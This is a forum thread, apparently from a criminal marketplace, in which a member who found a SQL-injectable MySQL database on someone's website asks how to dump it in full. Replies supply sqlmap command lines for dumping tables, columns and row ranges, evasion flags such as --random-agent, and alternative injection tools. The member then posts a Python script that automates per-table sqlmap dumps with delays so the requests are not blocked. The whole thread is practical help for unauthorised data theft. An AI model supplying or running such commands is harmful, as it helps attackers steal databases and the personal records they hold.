
Data Exfil Issue with SQLMap

molotov477

(L3) cache
Member
Joined: 01.11.2022
Messages: 182
Reactions: 44
Deal guarantor: 4
Hello, I have a small query. I found a vulnerable MySQL DB on a website, tested it manually, and then used SQLMap to get more details about the database. There is one primary large database that I am interested in dumping. I listed the individual tables and then decided to go with --dump-all in order to dump the entire database. However, there are some large tables with multiple columns, and whenever it's their turn to be dumped, SQLMap either crashes/gets stuck or the connection breaks. I have tried increasing the --time-sec value and tried different techniques, but for some reason I can't seem to dump those two large tables. What are my other options? Is there an alternative tool that can dump the database in a more stable manner, or another SQLMap feature that I can use or might be missing?

Any help and guidance would be appreciated, thanks.

The command that I am using is:
sqlmap -u "https://<target.com>/injection.php?id=1234" -p id --batch -D <databasename> --dump-all --random-agent --threads 10 --time-sec 10000 --technique=u


The response from SQLMap:

Code:
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=1234 UNION ALL SELECT NULL,NULL,CONCAT(0x7178707871,0x54476d786d495070795750686b4e557155564d6277444a6857427466704b707a7167615877644476,0x7171766271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
 
Without seeing the target it is hard to give you the best answer, but consider dumping only the columns you need, or dumping all of them separately and then merging:

--dump -C id,email,password
--dump -C id,firstname,lastname

Then

csvjoin -c id file1.csv file2.csv > merged_file.csv

Alternatively, you can try the --start and --stop options:

--start=1 --stop=1000
 
I have thought about dumping the tables individually as well, but I was hoping to automate the process. Another option I am considering is writing a small script that feeds in the table names one after another.

I just found out about Ghauri through the forum, so I'm trying it out now to see if it performs better; otherwise I will go for individual tables.
 
Good evening, dear friend

If you're hitting issues with SQLMap crashing or getting stuck when dumping large tables, there are a few tweaks and alternative tools you can use to make the process smoother and more stable:

1. Optimize SQLMap Usage
2. Increase Stability Parameters
3. Use Alternative Tools

Example for optimizing SQLMap usage:

First, tweak your Sqlmap command to target specific tables or columns incrementally. This reduces the load on the server and improves stability. Here are some approaches:

Instead of using --dump-all, specify the table name to dump it incrementally:
Bash:
sqlmap -u "https://<your.target.com>/injection.php?id=1234" -p id --batch -D <databasename> -T <tablename> --dump --random-agent --threads 10 --time-sec 10000 --technique=u

Target Specific Columns

If certain tables have many columns, specify which columns to dump:
Bash:
sqlmap -u "https://<your-target.com>/injection.php?id=1234" -p id --batch -D <databasename> -T <tablename> -C "column1,column2,column3" --dump --random-agent --threads 10 --time-sec 10000 --technique=u

Limit the Rows

Limit the number of rows dumped at a time using the --start and --stop options:

Bash:
sqlmap -u "https://<target.com>/injection.php?id=1234" -p id --batch -D <databasename> -T <tablename> --start=0 --stop=1000 --dump --random-agent --threads 10 --time-sec 10000 --technique=u

2. Increase Stability Parameters

Adjust parameters to make the connection more stable:

Decrease Threads

High thread counts might be causing the connection to break. Reduce the number of threads:
Bash:
sqlmap -u "https://<YOUR-target.com>/injection.php?id=1234" -p id --batch -D <databasename> --dump-all --random-agent --threads 5 --time-sec 10000 --technique=u

Increase Retries

Increase the number of retries for failed requests:
Bash:
sqlmap -u "https://<target.com>/injection.php?id=1234" -p id --batch -D <databasename> --dump-all --random-agent --threads 10 --time-sec 10000 --retries 5 --technique=u

3. Use Alternative Tools. Some examples below:

sqlninja

SQLNinja is another tool designed for exploiting SQL injection vulnerabilities, but note that it targets Microsoft SQL Server specifically and is driven by a configuration file (sqlninja.conf) rather than a URL argument, so it won't help against a MySQL backend like yours.

note: You can download Sqlninja from GitHub or its official site.

Another option is Sqlsus, a MySQL-focused injection and takeover tool. It has shipped with Kali Linux, and on Debian or Ubuntu you can install it where packaged:

Bash:
apt install sqlsus

Note that sqlsus is driven by a configuration file in which you set the target URL (generate a template with its genconf option; check sqlsus --help for the exact flag), then run it against that config:

Bash:
sqlsus my.conf


And finally, if you don't succeed, you can try [- Manual Dumping -]

Again, if you have any questions, tell me so that I can help you

best regards
 
Thank you so much for the detailed response. I will try dumping the tables one by one and see if that works, along with the stability tweaks you have suggested.

I just downloaded Ghauri from its GitHub. I will see if that helps; otherwise I will try out SQLNinja or Sqlsus as well, and if all else fails, I think your suggestion of dumping only the useful columns would be the right way to go.

Once again, thank you so much for all your help!
 
Just a little update: after trying and messing around with a few different tools, I settled on a Python script that takes table names from an input file, with a 10-second delay between dump commands to make sure my requests don't get blocked.

I tried using Ghauri, a recommendation I picked up from older posts, but it was just too slow; even listing the tables took an awfully long time, so I gave up on it.

Posting the script I used here in case it helps someone in the future.

Python:
import subprocess
import time

# Read table names (one per line) from a file
def read_table_names(file_path):
    with open(file_path, 'r') as file:
        return [line.strip() for line in file if line.strip()]

# Run the SQLMap command for a single table
def run_sqlmap(command_template, table_name):
    command = command_template.format(table=table_name)
    subprocess.run(command, shell=True)

# Main function
def main():
    # SQLMap command template; {table} is filled in per table.
    # --batch avoids interactive prompts when running unattended.
    sqlmap_command = ("sqlmap -u http://example.com/index.php?id=1 -p id --batch "
                      "-D dbname -T {table} --dump --threads 5 --time-sec 5 "
                      "--timeout=500 --retries=5")

    # Path to the file containing table names
    table_names_file = "table_names.txt"

    # Read table names from file
    table_names = read_table_names(table_names_file)

    # Run the SQLMap command for each table with a delay in between
    for table_name in table_names:
        run_sqlmap(sqlmap_command, table_name)
        time.sleep(10)  # Adjust the delay time as needed (in seconds)

if __name__ == "__main__":
    main()
 

